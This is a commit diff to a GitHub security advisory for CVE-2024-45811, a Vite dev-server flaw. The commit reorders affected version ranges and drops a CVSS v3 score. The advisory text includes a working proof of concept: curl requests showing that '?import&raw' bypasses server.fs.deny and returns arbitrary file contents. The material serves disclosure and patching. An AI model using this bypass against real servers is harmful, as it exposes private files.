Improve GHSA-9cwx-2883-4wfx

aprendis543 · aprendis543 · commit 72875ebd2bdc · 2025-12-12T21:24:24.000-06:00
diff --git a/advisories/github-reviewed/2024/09/GHSA-9cwx-2883-4wfx/GHSA-9cwx-2883-4wfx.json b/advisories/github-reviewed/2024/09/GHSA-9cwx-2883-4wfx/GHSA-9cwx-2883-4wfx.json
@@ -1,18 +1,14 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-9cwx-2883-4wfx",
-  "modified": "2024-09-19T18:34:32Z",
+  "modified": "2024-09-19T18:34:34Z",
   "published": "2024-09-17T18:44:12Z",
   "aliases": [
     "CVE-2024-45811"
   ],
   "summary": "Vite's `server.fs.deny` is bypassed when using `?import&raw`",
   "details": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.\n\n### PoC\n```sh\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n    <body>\n      <h1>403 Restricted</h1>\n      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```\n\n",
   "severity": [
-    {
-      "type": "CVSS_V3",
-      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
-    },
     {
       "type": "CVSS_V4",
       "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
@@ -73,14 +69,17 @@
           "type": "ECOSYSTEM",
           "events": [
             {
-              "introduced": "5.2.0"
+              "introduced": "4.0.0"
             },
             {
-              "fixed": "5.2.14"
+              "fixed": "4.5.4"
             }
           ]
         }
-      ]
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 4.5.3"
+      }
     },
     {
       "package": {
@@ -92,16 +91,16 @@
           "type": "ECOSYSTEM",
           "events": [
             {
-              "introduced": "4.0.0"
+              "introduced": "0"
             },
             {
-              "fixed": "4.5.4"
+              "fixed": "3.2.11"
             }
           ]
         }
       ],
       "database_specific": {
-        "last_known_affected_version_range": "<= 4.5.3"
+        "last_known_affected_version_range": "<= 3.2.10"
       }
     },
     {
@@ -114,17 +113,14 @@
           "type": "ECOSYSTEM",
           "events": [
             {
-              "introduced": "0"
+              "introduced": "5.2.0"
             },
             {
-              "fixed": "3.2.11"
+              "fixed": "5.2.14"
             }
           ]
         }
-      ],
-      "database_specific": {
-        "last_known_affected_version_range": "<= 3.2.10"
-      }
+      ]
     },
     {
       "package": {

Original file line number	Diff line number	Diff line change
`@@ -1,18 +1,14 @@`
`1`	`1`	`{`
`2`	`2`	`"schema_version": "1.4.0",`
`3`	`3`	`"id": "GHSA-9cwx-2883-4wfx",`
`4`		`- "modified": "2024-09-19T18:34:32Z",`
	`4`	`+ "modified": "2024-09-19T18:34:34Z",`
`5`	`5`	`"published": "2024-09-17T18:44:12Z",`
`6`	`6`	`"aliases": [`
`7`	`7`	`"CVE-2024-45811"`
`8`	`8`	`],`
`9`	`9`	"summary": "Vite's `server.fs.deny` is bypassed when using `?import&raw`",
`10`	`10`	"details": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.\n\n### PoC\n```sh\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n <body>\n <h1>403 Restricted</h1>\n <p>The request url "/tmp/secret.txt" is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```\n\n",
`11`	`11`	`"severity": [`
`12`		`- {`
`13`		`- "type": "CVSS_V3",`
`14`		`- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"`
`15`		`- },`
`16`	`12`	`{`
`17`	`13`	`"type": "CVSS_V4",`
`18`	`14`	`"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"`
`@@ -73,14 +69,17 @@`
`73`	`69`	`"type": "ECOSYSTEM",`
`74`	`70`	`"events": [`
`75`	`71`	`{`
`76`		`- "introduced": "5.2.0"`
	`72`	`+ "introduced": "4.0.0"`
`77`	`73`	`},`
`78`	`74`	`{`
`79`		`- "fixed": "5.2.14"`
	`75`	`+ "fixed": "4.5.4"`
`80`	`76`	`}`
`81`	`77`	`]`
`82`	`78`	`}`
`83`		`- ]`
	`79`	`+ ],`
	`80`	`+ "database_specific": {`
	`81`	`+ "last_known_affected_version_range": "<= 4.5.3"`
	`82`	`+ }`
`84`	`83`	`},`
`85`	`84`	`{`
`86`	`85`	`"package": {`
`@@ -92,16 +91,16 @@`
`92`	`91`	`"type": "ECOSYSTEM",`
`93`	`92`	`"events": [`
`94`	`93`	`{`
`95`		`- "introduced": "4.0.0"`
	`94`	`+ "introduced": "0"`
`96`	`95`	`},`
`97`	`96`	`{`
`98`		`- "fixed": "4.5.4"`
	`97`	`+ "fixed": "3.2.11"`
`99`	`98`	`}`
`100`	`99`	`]`
`101`	`100`	`}`
`102`	`101`	`],`
`103`	`102`	`"database_specific": {`
`104`		`- "last_known_affected_version_range": "<= 4.5.3"`
	`103`	`+ "last_known_affected_version_range": "<= 3.2.10"`
`105`	`104`	`}`
`106`	`105`	`},`
`107`	`106`	`{`
`@@ -114,17 +113,14 @@`
`114`	`113`	`"type": "ECOSYSTEM",`
`115`	`114`	`"events": [`
`116`	`115`	`{`
`117`		`- "introduced": "0"`
	`116`	`+ "introduced": "5.2.0"`
`118`	`117`	`},`
`119`	`118`	`{`
`120`		`- "fixed": "3.2.11"`
	`119`	`+ "fixed": "5.2.14"`
`121`	`120`	`}`
`122`	`121`	`]`
`123`	`122`	`}`
`124`		`- ],`
`125`		`- "database_specific": {`
`126`		`- "last_known_affected_version_range": "<= 3.2.10"`
`127`		`- }`
	`123`	`+ ]`
`128`	`124`	`},`
`129`	`125`	`{`
`130`	`126`	`"package": {`